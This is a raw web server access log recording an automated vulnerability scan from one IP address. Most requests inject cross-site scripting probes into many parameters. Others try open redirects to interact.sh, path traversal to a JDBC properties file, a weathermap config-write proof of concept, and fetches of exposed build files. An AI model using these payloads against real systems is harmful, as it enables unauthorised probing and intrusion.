195.164.49.69 - - [20/Oct/2024:20:37:32 +0000] GET /?edit-menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit-menu-item%27%29%3E&error=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-error%27%29%3E&post_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_title%27%29%3E&x=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-x%27%29%3E&down=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-down%27%29%3E&state=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-state%27%29%3E&data=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-data%27%29%3E&auth=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-auth%27%29%3E&themes=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-themes%27%29%3E&captcha=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-captcha%27%29%3E&nickname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nickname%27%29%3E&allusers=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-allusers%27%29%3E&color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-color%27%29%3E&path=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-path%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:32 +0000] GET /?next=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-next%27%29%3E&preview=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview%27%29%3E&shortcode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-shortcode%27%29%3E&features=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-features%27%29%3E&mode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mode%27%29%3E&out_trade_no=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-out_trade_no%27%29%3E&category=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category%27%29%3E&replytocom=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-replytocom%27%29%3E&from=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-from%27%29%3E&start=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start%27%29%3E&value=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-value%27%29%3E&range=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-range%27%29%3E&table=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-table%27%29%3E&limit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-limit%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:32 +0000] GET /?callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-callback%27%29%3E&weblog_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-weblog_title%27%29%3E&check=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-check%27%29%3E&overwrite=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-overwrite%27%29%3E&prefix=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-prefix%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-l%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-token%27%29%3E&start_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start_date%27%29%3E&direction=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-direction%27%29%3E&ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ID%27%29%3E&pid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pid%27%29%3E&to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-to%27%29%3E&checkemail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checkemail%27%29%3E&menu-locations=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-locations%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:32 +0000] GET /?name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-name%27%29%3E&json=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-json%27%29%3E&id_base=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id_base%27%29%3E&where=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-where%27%29%3E&request=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-request%27%29%3E¬es=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-notes%27%29%3E&img=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-img%27%29%3E&a=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-a%27%29%3E&menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-item%27%29%3E&xml=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-xml%27%29%3E&columns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-columns%27%29%3E&service=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-service%27%29%3E&site_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site_id%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:33 +0000] GET /?tags=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tags%27%29%3E&e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-e%27%29%3E&users=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-users%27%29%3E&format=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-format%27%29%3E&dl=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dl%27%29%3E&position=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-position%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-url%27%29%3E&theme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-theme%27%29%3E&firstname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-firstname%27%29%3E&fields=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fields%27%29%3E&form=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-form%27%29%3E&level=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-level%27%29%3E&month=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-month%27%29%3E&oauth_verifier=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_verifier%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:33 +0000] GET /?order_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order_id%27%29%3E&cookie=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cookie%27%29%3E&debug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-debug%27%29%3E&m=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-m%27%29%3E&dir=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dir%27%29%3E&new_role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new_role%27%29%3E&trashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trashed%27%29%3E&log=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-log%27%29%3E&excerpt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-excerpt%27%29%3E&settings-updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings-updated%27%29%3E&plugins=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugins%27%29%3E&modify=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-modify%27%29%3E&pwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pwd%27%29%3E&file=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:33 +0000] GET /?i=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-i%27%29%3E&database=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-database%27%29%3E&tax_input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax_input%27%29%3E&secret=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-secret%27%29%3E&mod=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mod%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-s%27%29%3E&stage=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stage%27%29%3E&time=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-time%27%29%3E&new=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-api_key%27%29%3E&invalid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-invalid%27%29%3E&db=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db%27%29%3E&upload=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-upload%27%29%3E&tablename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tablename%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:33 +0000] GET /?subject=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-subject%27%29%3E&sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sticky%27%29%3E&ns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ns%27%29%3E&history=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-history%27%29%3E&category_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category_id%27%29%3E&metakeyselect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyselect%27%29%3E©=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-copy%27%29%3E&product_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-product_id%27%29%3E&status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-status%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cat%27%29%3E&list=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-list%27%29%3E&val=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-val%27%29%3E&what=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-what%27%29%3E&group_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group_id%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:34 +0000] GET /?sort=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sort%27%29%3E&msg=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-msg%27%29%3E&hostname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hostname%27%29%3E&directory=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-directory%27%29%3E&disabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-disabled%27%29%3E&last_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-last_name%27%29%3E&oauth_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_token%27%29%3E&first_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-first_name%27%29%3E&delete_widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete_widget%27%29%3E&md5=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-md5%27%29%3E&selection=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-selection%27%29%3E&filename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filename%27%29%3E&address=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-address%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:34 +0000] GET /?ajax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ajax%27%29%3E&timezone_string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone_string%27%29%3E&group=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group%27%29%3E&update=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-update%27%29%3E&revision=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-revision%27%29%3E&referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-referer%27%29%3E&index=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-index%27%29%3E&src=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-src%27%29%3E&end_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end_date%27%29%3E&gmt_offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gmt_offset%27%29%3E¶ms=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-params%27%29%3E&html=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-html%27%29%3E&pass=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass%27%29%3E&offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-offset%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:34 +0000] GET /?image=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-image%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id%27%29%3E&order=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order%27%29%3E&sid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sid%27%29%3E&language=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-language%27%29%3E&filter=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filter%27%29%3E&import=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-import%27%29%3E&st=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-st%27%29%3E&act=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-act%27%29%3E&object=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-object%27%29%3E&insert=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-insert%27%29%3E&task=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-task%27%29%3E&dismiss=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dismiss%27%29%3E&orderby=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-orderby%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:34 +0000] GET /?up=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-up%27%29%3E&body=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-body%27%29%3E&return=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-return%27%29%3E&end=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end%27%29%3E&n=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-n%27%29%3E&opt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-opt%27%29%3E&source=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-source%27%29%3E&y=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-y%27%29%3E&parent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent%27%29%3E&reason=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reason%27%29%3E&meta=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-meta%27%29%3E&pass1=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass1%27%29%3E&blog=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog%27%29%3E&plugin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:34 +0000] GET /?option=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-option%27%29%3E&server=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-server%27%29%3E&admin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin%27%29%3E&create=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-create%27%29%3E&template=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-template%27%29%3E&number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-number%27%29%3E&lastname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lastname%27%29%3E&multi_number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-multi_number%27%29%3E&size=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-size%27%29%3E&tax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax%27%29%3E&sql=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sql%27%29%3E&show_sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show_sticky%27%29%3E&attachments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachments%27%29%3E&_method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_method%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:34 +0000] GET /?taxonomy=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-taxonomy%27%29%3E&tables=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tables%27%29%3E&confirm=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-confirm%27%29%3E&db_port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_port%27%29%3E&op=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-op%27%29%3E&untrashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-untrashed%27%29%3E&tid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tid%27%29%3E&flag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-flag%27%29%3E&stylesheet=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stylesheet%27%29%3E&download=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-download%27%29%3E&comment_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_status%27%29%3E&_wpnonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wpnonce%27%29%3E&metakeyinput=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyinput%27%29%3E&remove=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-remove%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:34 +0000] GET /?deleted=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-deleted%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-search%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action%27%29%3E&newname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newname%27%29%3E&info=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-info%27%29%3E&content=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-content%27%29%3E&signature=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signature%27%29%3E&noconfirmation=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noconfirmation%27%29%3E&field=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field%27%29%3E&output=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-output%27%29%3E&city=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-city%27%29%3E&rename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rename%27%29%3E&mail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mail%27%29%3E&term=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-term%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:38:12 +0000] GET /?widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget%27%29%3E&height=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-height%27%29%3E&screen=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-screen%27%29%3E&pass2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass2%27%29%3E&redirect_to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect_to%27%29%3E&items=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-items%27%29%3E&string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-string%27%29%3E&hidden=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hidden%27%29%3E&f=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-f%27%29%3E&step=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-step%27%29%3E&role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-role%27%29%3E&preview_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_nonce%27%29%3E&date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-date%27%29%3E&event=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-event%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:38:12 +0000] GET /?num=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-num%27%29%3E&drop=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-drop%27%29%3E&g-recaptcha-response=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g-recaptcha-response%27%29%3E&field_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field_id%27%29%3E&user_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_email%27%29%3E&alias=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-alias%27%29%3E&ref=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ref%27%29%3E&save=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-save%27%29%3E&enabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enabled%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-year%27%29%3E&checked=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checked%27%29%3E&post_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_ID%27%29%3E&files=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-files%27%29%3E&text-color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text-color%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:38:12 +0000] GET /?admin_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_email%27%29%3E&code=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-code%27%29%3E&dump=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dump%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-item%27%29%3E&timezone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone%27%29%3E&blog_public=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog_public%27%29%3E&add=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-add%27%29%3E&enable=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enable%27%29%3E&customized=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-customized%27%29%3E&admin_password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_password%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keywords%27%29%3E×tamp=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timestamp%27%29%3E&label=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-label%27%29%3E&g=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:38:12 +0000] GET /?location=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-location%27%29%3E&link_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_url%27%29%3E&post_mime_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_mime_type%27%29%3E&uid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uid%27%29%3E&host=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-host%27%29%3E&cmd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cmd%27%29%3E&link_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_id%27%29%3E&reset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reset%27%29%3E&nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nonce%27%29%3E&username=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-username%27%29%3E&site=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site%27%29%3E&do=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-do%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-email%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:38:39 +0000] GET /plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties¶m¶m2&debug=existing&node_name&node_x&node_y&node_new_name&node_label&node_infourl&node_hover&node_iconfilename=--NONE--&link_name&link_bandwidth_in&link_bandwidth_out&link_target&link_width&link_infourl&link_hover&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7 HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:20:38:41 +0000] GET /plugins/weathermap/configs/poc.conf HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:20:38:43 +0000] GET /properties-list.php?property-types=1&types=2&location&prices&bedroom&code=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:20:38:45 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:39:20 +0000] GET /appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password HTTP/1.1 404 1096
- - - [20/Oct/2024:20:39:23 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:39:24 +0000] GET /?gf_page=randomstring HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:39:26 +0000] GET /sap/public/bc/icf/logoff?redirecturl=https://interact.sh HTTP/1.1 404 1114
- - - [20/Oct/2024:20:39:29 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:39:30 +0000] GET /zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:20:39:33 +0000] GET /microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/2niWU8FcSOycsrNpK8UUrRR7mDv/)%3B%3C%2Fscript%3E%3C HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:20:39:35 +0000] GET /mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms:// HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:20:39:37 +0000] GET /does_not_exist%22%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E%3Cimg%20src=x HTTP/1.1 404 1166
195.164.49.69 - - [20/Oct/2024:20:39:39 +0000] GET /wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404 HTTP/1.1 404 1158
195.164.49.69 - - [20/Oct/2024:20:39:41 +0000] GET /de2api/engine/getEngine;.js HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:20:39:43 +0000] GET /.appveyor.yml HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:20:39:45 +0000] GET /appveyor.yml HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:20:39:47 +0000] GET /novius-os/admin/nos/login?redirect=http://interact.sh HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:20:39:49 +0000] GET /libraries/joomla/database/ HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:20:39:51 +0000] GET /settings HTTP/1.1 404 1082
- - - [20/Oct/2024:20:39:53 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:39:55 +0000] GET /.dockerfile HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:20:39:57 +0000] GET /.Dockerfile HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:20:39:59 +0000] GET /Dockerfile HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:20:40:00 +0000] GET /embed.js HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:20:40:03 +0000] GET /core/authorize.php HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:20:40:05 +0000] GET /examples/jsp/snp/snoop.jsp;%3Cscript%3Ealert%28document.domain%29%3C/script%3Etest.jsp HTTP/1.1 404 1176
195.164.49.69 - - [20/Oct/2024:20:40:26 +0000] GET //www.interact.sh HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:20:40:29 +0000] GET /jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties HTTP/1.1 404 1133
83.212.98.101 - - [20/Oct/2024:20:40:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:20:40:50 +0000] GET /%2f/ HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:20:40:52 +0000] GET /sample-apps/hello/%2f/ HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:20:40:54 +0000] GET /squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small HTTP/1.1 404 1083
- - - [20/Oct/2024:20:40:56 +0000] GET null HTTP/1.1 400 2308
